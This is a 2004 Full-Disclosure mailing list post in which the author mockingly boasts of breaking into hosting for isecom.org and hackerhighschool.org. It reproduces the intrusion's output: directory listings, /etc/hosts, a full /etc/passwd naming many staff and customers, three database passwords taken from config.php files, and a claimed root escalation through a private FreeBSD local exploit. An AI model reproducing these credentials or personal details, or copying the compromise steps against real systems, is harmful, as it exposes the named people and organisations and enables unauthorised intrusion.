[Full-Disclosure] Isecom.org ideahamster.org and the hackerhighschool.org

Hans Ulrich Niedermann Tue, 30 Nov 2004 07:45:19 -0800

After my image as whitehat was damaged acting like a riper...

I decided to turn myself blackhat, couse i feel more kool, leet and
smart.


I will start certifying myself as recogniced hacker... How?

Hacking the main whitehat website (h0h0h0 ph333r m333) <- and
starting to speak l337

- ------------------------------------------------------------------
--


Our senior attack and penetration team, want to obtain OSSTMM
certificate and HACKER HIGH SCHOOL license. Couse we are blackhats
we have no money to pay this certs. (no one of us work in the sec
industry, so no money). We will obtain it by ourselves:


NOTE: All teqneeqz in this hack are open source security testing
metodology manual (OSSTMM) compliant... of course.


Pen-tester like hacking:

1) read bugtraq.
2) get the las published exploit.
3) do some changes (1 or 2 lines ... or change credits of the xpl
is enough).
4) ./exploit host


* pen-tester: hacker who uses canvas, core-impact, metasploit or
retina/nessus to hack.

P.S: sonnee cheers raul


uid=65534(nobody) gid=998(www) groups=998(www)
FreeBSD kunatri.pair.com 4.8-STABLE FreeBSD 4.8-STABLE #0: Thu Jul
1 11:16:09 EDT 2004
[EMAIL PROTECTED]:/usr/src/sys/compile/PAIRqq  i386


drwxr-xr-x  12 idea  users   1024 Aug 30 18:22 .
drwxr-xr-x  49 idea  users   4096 Nov 22 05:27 ..
drwxr-xr-x   2 idea  users   1024 Jul 17 11:58 admin
drwxr-xr-x   2 idea  users    512 Jul 10 14:16 cache
- -rw-r--r--   1 idea  users   5796 Jul 17 11:58 common.php
- -rwx---rwx   1 idea  users    268 Aug 25 05:34 config.php
drwxr-xr-x   2 idea  users    512 Jul 17 11:58 contrib.pete.bak
drwxr-xr-x   2 idea  users    512 Jul 17 11:58 db
drwxr-xr-x   2 idea  users    512 Jul 17 11:58 docs
- -rw-r--r--   1 idea  users    810 Jul 17 11:58 extension.inc
- -rw-r--r--   1 idea  users   3643 Jul 17 11:58 faq.php
- -rw-r--r--   1 idea  users  45641 Jul 17 11:58 groupcp.php
drwxr-xr-x   4 idea  users    512 Jul 17 11:58 images
drwxr-xr-x   2 idea  users   1024 Jul 17 11:58 includes
- -rw-r--r--   1 idea  users  14515 Jul 17 11:58 index.php
drwxr-xr-x   3 idea  users    512 Jul 17 11:58 install.pete.bak
drwxr-xr-x   3 idea  users    512 Jul 17 11:58 language
- -rw-r--r--   1 idea  users   7479 Jul 17 11:58 login.php
- -rw-r--r--   1 idea  users  12150 Jul 17 11:58 memberlist.php
- -rw-r--r--   1 idea  users  37639 Jul 17 11:58 modcp.php
- -rw-r--r--   1 idea  users  34446 Jul 17 11:58 posting.php
- -rw-r--r--   1 idea  users  72578 Jul 17 11:58 privmsg.php
- -rw-r--r--   1 idea  users   3753 Jul 17 11:58 profile.php
- -rw-r--r--   1 idea  users  42692 Jul 17 11:58 search.php
drwxr-xr-x   3 idea  users    512 Jul 17 11:58 templates
- -rw-r--r--   1 idea  users  23154 Jul 17 11:58 viewforum.php
- -rw-r--r--   1 idea  users   7234 Jul 17 11:58 viewonline.php
- -rw-r--r--   1 idea  users  45150 Jul 17 11:58 viewtopic.php


# $FreeBSD: src/etc/hosts,v 1.11.2.1 2000/08/18 18:29:19 ume Exp $
#
# Host Database
# This file should contain the addresses and aliases
# for local hosts that share this file.
# In the presence of the domain name service or NIS, this file may
# not be consulted at all; see /etc/host.conf for the resolution
order.
#
#
::1                     localhost localhost.my.domain
myname.my.domain
127.0.0.1               localhost localhost.my.domain
myname.my.domain

192.168.1.1             beast.pair.net beast
192.168.1.2             beauty.pair.net beauty
192.168.1.4             chromium.pair.net chromium
192.168.1.5             carbon.pair.net carbon
192.168.1.6             copper.pair.net copper
192.168.1.7             cadmium.pair.net cadmium
192.168.1.8             baal.pair.net baal
192.168.1.9             bodhi.pair.net bodhi
192.168.1.10            butyl.pair.net butyl
192.168.1.11            biabo.pair.net biabo


heelwing         ttyp0    Nov 18 14:27 (24.8.200.204)
heelwing         ttyp4    Nov 22 14:00 (24.8.200.204)


root:*:0:0:Super User:/root:/bin/csh
daemon:*:1:1:Daemon:/nonexistent:/sbin/nologin
operator:*:2:5:Operator:/nonexistent:/sbin/nologin
bin:*:3:7:Binaries:/nonexistent:/sbin/nologin
tty:*:4:65533:tty Sandbox:/nonexistent:/sbin/nologin
kmem:*:5:65533:kmem Sandbox:/nonexistent:/sbin/nologin
games:*:7:13:Games:/nonexistent:/sbin/nologin
news:*:8:8:News Subsystem:/nonexistent:/sbin/nologin
man:*:9:9:Man Pages:/nonexistent:/sbin/nologin
ftp:*:14:5:Anonymous FTP Admin:/usr/ftp:/nonexistent
bind:*:53:53:BIND Sandbox:/nonexistent:/sbin/nologin
uucp:*:66:66:UUCP:/nonexistent:/sbin/nologin
xten:*:67:67:X-10:/nonexistent:/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
sshd:*:180:180:sshd:/var/empty:/nonexistent
popa3d:*:799:799:POP3 Daemon:/nonexistent:/sbin/nologin
slist:*:800:800:SmartList Manager:/usr/home/slist:/bin/csh
msql:*:860:860:mSQL Administrator:/nonexistent:/bin/csh
mysql:*:861:861:MySQL Admin:/nonexistent:/bin/csh
logs:*:950:20:logs:/usr/home/staff/logs:/bin/csh
spamd:*:951:862:spamd:/var/sa:/bin/csh
alias:*:7790:2108:qmail Alias:/var/qmail/alias:/nonexistent
qmaild:*:7791:2108:qmailD:/var/qmail:/nonexistent
qmaill:*:7792:2108:qmailL:/var/qmail:/nonexistent
qmailp:*:7793:2108:qmailP:/var/qmail:/nonexistent
qmailq:*:7794:2107:qmailQ:/var/qmail:/nonexistent
qmailr:*:7795:2107:qmailR:/var/qmail:/nonexistent
qmails:*:7796:2107:qmailS:/var/qmail:/nonexistent
info:*:900:20:Information Role
Account:/usr/home/staff/info:/bin/csh
support:*:901:20:Support Role
Account:/usr/home/staff/support:/bin/csh
pair:*:902:20:pair Networks:/usr/home/staff/pair:/bin/csh
www:*:903:20:Webmaster Role Account:/usr/home/staff/www:/bin/csh
sales:*:906:20:Sales Role Account:/usr/home/staff/sales:/bin/csh
domain:*:907:20:Domain Registration Role
Account:/usr/home/staff/domain:/bin/csh
urgent:*:908:20:Urgent Contact - Emergencies
Only:/usr/home/staff/urgent:/bin/csh
billing:*:909:20:Billing Role
Account:/usr/home/staff/billing:/bin/csh
upgrade:*:910:20:Upgrade Role
Account:/usr/home/staff/upgrade:/bin/csh
security:*:914:20:Security Role
Account:/usr/home/staff/security:/bin/csh
abuse:*:915:20:Abuse Role Account:/usr/home/staff/abuse:/bin/csh
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
sigma:*:1000:20:Kevin Martin:/usr/home/staff/sigma:/bin/csh
pupdog:*:1002:20:pupdog:/usr/home/staff/pupdog:/bin/csh
matt:*:1006:20:Matt Riffle:/usr/home/staff/matt:/usr/local/bin/tcsh
gk:*:1007:20:Gus Kumpfmiller:/usr/home/staff/gk:/bin/csh
cap:*:1012:20:cap:/usr/home/staff/cap:/usr/local/bin/tcsh
timg:*:1017:20:Tim:/usr/home/staff/timg:/usr/local/bin/zsh
rjenison:*:1018:20:Bob:/usr/home/staff/rjenison:/usr/local/bin/tcsh
elizabet:*:1024:20:elizabet:/usr/home/staff/elizabet:/bin/csh
melea:*:1029:20:melea:/usr/home/staff/melea:/usr/local/bin/zsh
jbeck:*:1030:20:jbeck:/usr/home/staff/jbeck:/usr/local/bin/tcsh
pjmclaug:*:1032:20:pjmclaug:/usr/home/staff/pjmclaug:/bin/csh
wright:*:1033:20:wright:/usr/home/staff/wright:/bin/csh
alan:*:1037:20:alan:/usr/home/staff/alan:/usr/local/bin/zsh
erik5:*:1038:20:erik5:/usr/home/staff/erik5:/bin/sh
mlehner:*:1039:20:mlehner:/usr/home/staff/mlehner:/bin/csh
dianeh:*:1043:20:dianeh:/usr/home/staff/dianeh:/usr/local/bin/tcsh
marciew:*:1044:20:angelas:/usr/home/staff/marciew:/usr/local/bin/tcs

h
sxpst1:*:1045:20:sxpst1:/usr/home/staff/sxpst1:/usr/local/bin/tcsh
aharrod:*:1050:20:aharrod:/usr/home/staff/aharrod:/usr/local/bin/tcs

h
bbroome:*:1051:20:bbroome:/usr/home/staff/bbroome:/usr/local/bin/tcs

h
terram:*:1054:20:terram:/usr/home/staff/terram:/usr/local/bin/tcsh
cwest:*:1055:20:cwest:/usr/home/staff/cwest:/usr/local/bin/tcsh
pfawcett:*:1057:20:pfawcett:/usr/home/staff/pfawcett:/usr/local/bin/

tcsh
cmemmolo:*:1059:20:cmemmolo:/usr/home/staff/cmemmolo:/usr/local/bin/

tcsh
cyn17:*:1060:20:cyn17:/usr/home/staff/cyn17:/usr/local/bin/tcsh
blich:*:1061:20:blich:/usr/home/staff/blich:/usr/local/bin/tcsh
davae:*:1062:20:davae:/usr/home/davae:/usr/local/bin/tcsh
debv:*:1063:20:debv:/usr/home/staff/debv:/usr/local/bin/tcsh
postgres:*:862:862:Postgres Admin:/usr/local/pgsql:/bin/sh
megana:*:1067:20:megana:/usr/home/staff/megana:/usr/local/bin/tcsh
garyh:*:1068:20:garyh:/usr/home/staff/garyh:/usr/local/bin/tcsh
casey:*:1069:20:Casey
West:/usr/home/staff/casey:/usr/local/bin/bash
kevino:*:1070:20:Kevin O'Connor:/usr/home/staff/kevino:/bin/csh
mddst34:*:1072:20:Matthew
Dalessandro:/usr/home/staff/mddst34:/bin/csh
danw:*:1073:20:Dan Wyrostek:/usr/home/staff/danw:/usr/local/bin/zsh
erich:*:1074:20:Eric Howard:/usr/home/staff/erich:/bin/csh
amy:*:1076:20:Amy Lerner:/usr/home/staff/amy:/bin/csh
psenevir:*:1078:20:Prashad
Seneviratne:/usr/home/staff/psenevir:/usr/local/bin/bash
waynel:*:1079:20:Wayne Lucas:/usr/home/staff/waynel:/bin/csh
jpooley:*:1080:20:Jaime Pooley:/usr/home/staff/jpooley:/bin/csh
kettell:*:1081:20:Brian Kettell:/usr/home/staff/kettell:/bin/csh
sona:*:1082:20:Unnamalai Narayanan:/usr/home/staff/sona:/bin/csh
astark:*:3002:1000:Allan Stark:/usr/home/astark:/bin/csh
kinoeye:*:3003:1000:David Tames:/usr/home/kinoeye:/bin/csh
play:*:3004:1000:Michael Kyrioglou:/usr/home/play:/bin/csh
thekente:*:3006:1000:Robert Kyerematen:/usr/home/thekente:/bin/csh
heelwing:*:3007:1000:Will Ronco:/usr/home/heelwing:/bin/csh
smelikai:*:3008:1000:Keelin Chan:/usr/home/smelikai:/bin/csh
butler:*:3009:1000:Nick Frost:/usr/home/butler:/bin/csh
mystiqal:*:3011:1000:Nardia Drayton:/usr/home/mystiqal:/bin/csh
fennel:*:3012:1000:Nate Borofsky:/usr/home/fennel:/bin/csh
unionist:*:3013:1000:David Prosten:/usr/home/unionist:/bin/csh
bizgate:*:3014:1000:Randy Brooks:/usr/home/bizgate:/bin/csh
guidomic:*:3015:1000:Michele Guidoni:/usr/home/guidomic:/bin/tcsh
master:*:3016:1000:James Lancelot:/usr/home/master:/bin/csh
mokolabs:*:3017:1000:Patrick Crowley:/usr/home/mokolabs:/bin/csh
iwatchgr:*:3018:1000:Juliana Shearer:/usr/home/iwatchgr:/bin/csh
photocrk:*:3019:1000:Michael Knowles:/usr/home/photocrk:/bin/csh
jobgenie:*:3020:1000:YURI KOZLOV:/usr/home/jobgenie:/bin/csh
louiedee:*:3021:1000:Mark Ingles:/usr/home/louiedee:/bin/csh
outdoor3:*:3026:1000:Barry Kiesler:/usr/home/outdoor3:/bin/csh
cbartow:*:3025:1000:Christopher
Bartow,NJ:/usr/home/cbartow:/etc/somkix
capslock:*:3023:1000:Allen Crider:/usr/home/capslock:/etc/usagi
pcmesh:*:3010:1000:Abraham
Ghandforoush:/usr/home/pcmesh:/etc/itonami
touch:*:3028:1000:Jim Gale:/usr/home/touch:/bin/csh
enet2:*:3029:1000:Charles and Roxanne
Heller:/usr/home/enet2:/bin/csh
hoghead:*:3030:1000:D.A. Hammond:/usr/home/hoghead:/bin/csh
mooseand:*:3032:1000:John Bloor:/usr/home/mooseand:/bin/csh
nsane:*:3033:1000:3000K Inc.:/usr/home/nsane:/bin/csh
models:*:3034:1000:Clement J. Naples:/usr/home/models:/bin/csh
teltex:*:3036:1000:Jeff Williamson:/usr/home/teltex:/bin/csh
recovery:*:3037:1000:Kenneth Roberts:/usr/home/recovery:/bin/csh
gwen98:*:3038:1000:Gwendolyn Galsworth:/usr/home/gwen98:/bin/csh
speakerb:*:3039:1000:Roy Rubin:/usr/home/speakerb:/bin/csh
salesu:*:3040:1000:Thomas Phillips:/usr/home/salesu:/bin/csh
effectiv:*:3041:1000:Michael Stearne:/usr/home/effectiv:/etc/vala
ams:*:3042:1000:CHARALABOS ARGIROPOULOS:/usr/home/ams:/bin/csh
maninstr:*:3043:1000:Fabio Giorgi:/usr/home/maninstr:/bin/csh
mambo2:*:3044:1000:Sonyo Sin:/usr/home/mambo2:/bin/csh
travish:*:3045:1000:Travis J. Hicks:/usr/home/travish:/bin/tcsh
cccisd:*:3046:1000:Chris Hehman:/usr/home/cccisd:/bin/csh
shaman73:*:3047:1000:Christopher
Hartnett:/usr/home/shaman73:/bin/csh
idea:*:3048:1000:Peter Herzog:/usr/home/idea:/bin/csh
pyro:*:3049:1000:Aaron Holmes:/usr/home/pyro:/bin/csh
7inch:*:3050:1000:Gary Bahen:/usr/home/7inch:/bin/csh
jburg:*:3051:1000::/usr/home/jburg:/bin/csh
krung:*:3052:1000:Paul R. Figura:/usr/home/krung:/bin/csh
kltoner:*:3054:1000:Christophoros
Kolokythas:/usr/home/kltoner:/bin/csh
jfedorko:*:3055:1000:Joel Fedorko:/usr/home/jfedorko:/bin/csh
nwsi:*:3056:1000:Mike:/usr/home/nwsi:/usr/local/bin/bash
minadfvr:*:3057:1000:Nanette Tolleson:/usr/home/minadfvr:/bin/csh
operativ:*:3058:1000:Adel Saad:/usr/home/operativ:/bin/csh
iaction:*:3060:1000:Steven Toepfer:/usr/home/iaction:/bin/csh
yupadoo:*:3061:1000:joseph p. brown jr:/usr/home/yupadoo:/bin/csh
catdweb:*:3062:1000:Everett Sturm:/usr/home/catdweb:/bin/csh
v55r8qff:*:3063:1000:Derek G Kaler:/usr/home/v55r8qff:/bin/csh
mycoss:*:3064:1000:Nick Dinatale:/usr/home/mycoss:/bin/csh
jcblb:*:3065:1000:Jim Bryant:/usr/home/jcblb:/bin/csh
ccn:*:3066:1000:Rosie Faya:/usr/home/ccn:/bin/csh
ces0160r:*:3067:1000:Charles W Roberts:/usr/home/ces0160r:/bin/csh
vlahos:*:3070:1000:John Vlahos:/usr/home/vlahos:/bin/csh
triplett:*:3071:1000:Bill Triplett:/usr/home/triplett:/bin/csh
croatia:*:3072:1000:Zvonko Petrovic:/usr/home/croatia:/bin/csh
nichiai:*:3073:1000:Declan Bourke:/usr/home/nichiai:/bin/csh
vclc:*:3074:1000:kfoglia:/usr/home/vclc:/bin/csh
cynelli:*:3076:1000:Sandra Papandrea:/usr/home/cynelli:/bin/csh
episcop:*:3077:1000:Robb Roaten:/usr/home/episcop:/bin/tcsh
jfgsj:*:3078:1000:Janet W. Berg:/usr/home/jfgsj:/bin/csh
hitwcad:*:3079:1000:Alicia Wettenstein:/usr/home/hitwcad:/bin/csh
spoint:*:3081:1000:Thomas
Lopatic:/usr/home/spoint:/usr/local/bin/tcsh
grayvet:*:3082:1000:Graham Hines:/usr/home/grayvet:/bin/csh
aaronl:*:3083:1000:Aaron C Lyon:/usr/home/aaronl:/bin/csh
jshanin:*:3084:1000:Jonathan Shanin:/usr/home/jshanin:/bin/csh
labwize:*:3085:1000::/usr/home/labwize:/bin/csh
marn:*:3086:1000:Marnie Whillock Becker:/usr/home/marn:/bin/csh
cqisllc:*:3087:1000:cqisllc:/usr/home/cqisllc:/bin/csh
goodinya:*:3088:1000:SAM VIRAG:/usr/home/goodinya:/bin/csh
fwdirect:*:3089:1000:Roy
Stocker:/usr/home/fwdirect:/usr/local/bin/tcsh
viscount:*:3090:1000:David McKenzie:/usr/home/viscount:/bin/csh
soneal:*:3091:1000:Shaun ONeal:/usr/home/soneal:/bin/csh
larchet:*:3092:1000::/usr/home/larchet:/bin/csh
discount:*:3094:1000:Brian Mogelefsky:/usr/home/discount:/bin/csh
njyoder:*:3095:1000:Nathan
Yoder:/usr/home/njyoder:/usr/local/bin/bash
seat:*:3096:1000:Jennifer Kelley Kelley
Container:/usr/home/seat:/bin/csh
mindloom:*:3097:1000:Jed Harris:/usr/home/mindloom:/bin/csh
dansonia:*:3098:1000:Daniel G Sommars:/usr/home/dansonia:/bin/csh
breynold:*:3099:1000:Brian Reynolds:/usr/home/breynold:/bin/csh
yourmone:*:3100:1000:LAKE RIVER  CANAL:/usr/home/yourmone:/bin/csh
majorlab:*:3101:1000:Brenda N Major:/usr/home/majorlab:/bin/csh
kbuck:*:3102:1000:Kenneth J Buckland:/usr/home/kbuck:/bin/csh
towerh2o:*:3103:1000:Stephen Sabolich:/usr/home/towerh2o:/bin/csh
nocouch:*:3104:1000:Kevin Spensley:/usr/home/nocouch:/bin/csh
orrt:*:3105:1000:Gloria Skurski :/usr/home/orrt:/bin/csh
stoneage:*:3106:1000:Douglas Kelly:/usr/home/stoneage:/bin/csh
dsisec:*:3107:1000:Michael C Stamps:/usr/home/dsisec:/bin/csh
evanevan:*:3108:1000:A R Blechner:/usr/home/evanevan:/bin/csh
jasper:*:3109:1000:Stephen D. Furbish:/usr/home/jasper:/bin/csh
rgensler:*:3053:1000:Matt Butler:/usr/home/rgensler:/etc/sama
rlpatton:*:3110:1000:Ronald L Patton:/usr/home/rlpatton:/bin/csh
forsterb:*:3093:1000:Evan Forster:/usr/home/forsterb:/etc/lliamna
quisci:*:3069:1000:Iain Trotter:/usr/home/quisci:/etc/lliamna
lab21:*:3005:1000:Nathaniel Benson:/usr/home/lab21:/bin/csh
onirix:*:3035:1000:Paul Rombough:/usr/home/onirix:/etc/shema
citibay:*:3024:1000:Marlon Famorca:/usr/home/citibay:/etc/izalc
webmil:*:3022:1000:Karen Patterson:/usr/home/webmil:/etc/djalbat
thomfam:*:3059:1000:Zach Thomas:/usr/home/thomfam:/etc/tyungwa
pes:*:3075:1000::/usr/home/pes:/etc/omega
helpself:*:3027:1000:Thayer White:/usr/home/helpself:/etc/sitkin
nmorgan:*:3031:1000:Nathan Morgan:/usr/home/nmorgan:/etc/kwarcu
laemmle:*:3080:1000:Steve Leventhal:/usr/home/laemmle:/etc/shema
nharbour:*:3068:1000:Eugene Ware:/usr/home/nharbour:/etc/yali

grep idea /etc/passwd
idea:*:3048:1000:Peter Herzog:/usr/home/idea:/bin/csh

Pete pete! HURRA! ... 0ops Herzog!


config.php:$dbpasswd = 'CnbVMgz2';
Binary file includes matches
profile.php:            include($phpbb_root_path .
'includes/usercp_sendpasswd.'.$phpEx);

/config.php:$dbpasswd = 'e4FzyXXC';
Binary file ../includes matches
Binary file ../isestorm matches
/profile.php:         include($phpbb_root_path .
'includes/usercp_sendpasswd.'.$phpEx);


/hhs_support/config.php:$dbpasswd = 'LJsaDFZT';
Binary file ../hhs_support/includes matches
/hhs_support/profile.php:             include($phpbb_root_path .
'includes/usercp_sendpasswd.'.$phpEx);



total 294
drwxr-xr-x    9 idea  users   1024 Nov  3 10:11 .
drwxr-xr-x  106 root  wheel   2048 Jul 28 22:18 ..
- -rw-r--r--    1 idea  users      0 Mar 15  2004 .addressbook
- -rw-------    1 idea  users   2285 Mar 15  2004 .addressbook.lu
- -rw-r--r--    1 idea  users    628 Mar  6  2001 .cshrc
drwx------    2 idea  users    512 Feb  8  2004 .gnupg
- -rw-------    1 idea  users   2596 Nov 20 07:10 .history
drwx------    2 idea  users    512 Nov  2 13:57 .imap
drwx------    2 idea  users    512 Aug 25 04:29 .links
- -rw-r--r--    1 idea  users    299 Mar  6  2001 .login
- -rw-r--r--    1 idea  users    160 Mar  6  2001 .login_conf
- -rw-------    1 idea  users    371 Mar  6  2001 .mail_aliases
- -rw-r--r--    1 idea  users    335 Jun 16 10:32 .mailrc
drwxr-xr-x    2 idea  users    512 Nov 17  2003 .ncftp
- -rw-------    1 idea  users     66 Nov 17  2003 .ncrecent
- -rw-r--r--    1 idea  users     11 May  4  2001 .pair
- -rw-------    1 idea  users  15018 Nov  3 10:11 .pine-debug1
- -rw-------    1 idea  users  12742 Oct 11 17:28 .pine-debug2
- -rw-------    1 idea  users  12235 Sep  9 13:15 .pine-debug3
- -rw-------    1 idea  users  12410 Sep  3 13:45 .pine-debug4
- -rw-------    1 idea  users  15804 Nov  3 10:08 .pinerc
- -rw-r--r--    1 idea  users    722 Mar  6  2001 .profile
- -rw-r--r--    1 idea  users    852 Mar  6  2001 .shrc
- -rw-------    1 idea  users      1 Nov  3 10:08 dead.letter
- -rw-r--r--    1 idea  users   2929 Jul 12 03:27 index.html
- -rw-r--r--    1 idea  users  14815 Jul 31 06:28 isecom.org.scan
drwx------    2 idea  users    512 Sep 15 03:15 log_config
- -rw-r--r--    1 idea  users     25 Mar 24  2004 logclean.sh
drwx------    2 idea  users    512 Nov  3 10:09 mail
- -rw-------    1 idea  users    534 Nov  3 10:11 mbox
lrwxrwxrwx    1 root  users     21 Dec 15  2003 public_ftp ->
/usr/public_ftp/idea/
lrwxrwxrwx    1 root  users     19 Dec 15  2003 public_html ->
/usr/www/users/idea
lrwxr-xr-x    1 root  users     20 Dec 15  2003 public_ssl ->
/usr/wwws/users/idea
- -rw-r--r--    1 idea  users  32768 Apr  9  2004 schedule.shtml
- -rw-r--r--    1 idea  users      0 Sep  9 14:04 tmp
drwxr-xr-x    2 idea  users   1024 Nov 23 00:31 www_logs

ls -la /usr/home/idea/public_html/hhs/
total 3426
drwxr-xr-x   2 idea  users     512 Aug 26 16:05 .
drwxr-xr-x  49 idea  users    4096 Nov 22 05:27 ..
- -rw-r--r--   1 idea  users     175 Aug 27 19:29 index.shtml
- -rw-r--r--   1 idea  users  817584 Sep  3  2003 lesson.pdf
- -rw-r--r--   1 idea  users  901665 Sep  3  2003 tema.pdf
- -rw-r--r--   1 idea  users    2866 Aug 26 15:04 ticker.htm


cat /usr/home/idea/public_html/.htaccess
# -FrontPage-

IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

ErrorDocument 401 /401.html
ErrorDocument 403 /403.html
ErrorDocument 404 /404.html
ErrorDocument 500 /500.html

<Limit GET POST>
order deny,allow
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>

AuthName www.isecom.org
AuthUserFile
/home/virtual/site12/fst/var/www/html/_vti_pvt/service.pwd
AuthGroupFile
/home/virtual/site12/fst/var/www/html/_vti_pvt/service.grp

header append Identity: 'The Institute for Security and Open
Methodologies'
header append P3P: 'Not supported at this time'

'cat /home/virtual/site12/fst/var/www/html/_vti_pvt/service.pwd
nothing :-(


----------> END OF "PEN-TESTER LIKE" HACKING <-----------------

----------> Starting "#darknet like" hacking <----------------


/msg divineint> y0, do you have new stuff for fbsd?
divineint> sure freebsdlocal0day-donotdistributed-suppliedby-
divineint.tgz
/msg divineint> great i love you baby


tar xvzf freebsdlocal0day-donotdistributed-suppliedby-divineint.tgz
make freebsdlocal0day-donotdistributed-suppliedby-divineint
/freebsdlocal0day-donotdistributed-suppliedby-divineint

uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)

great! I feeel hax tanananananna tan


Save a bug, save a life

PD: 
I will never disclose a 0day again.
I will never disclose a 0day again.
I will never disclose a 0day again.
I will never disclose a 0day again.
I will never disclose a 0day again.
I will never disclose a 0day again.
I will never disclose a 0day again.
I will never disclose a 0day again.
I will never disclose a 0day again.
I will never disclose a 0day again.




Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program: 
http://www.hushmail.com/about-affiliate?l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Isecom.org ideahamster.org and the hackerhighschool.org

Reply via email to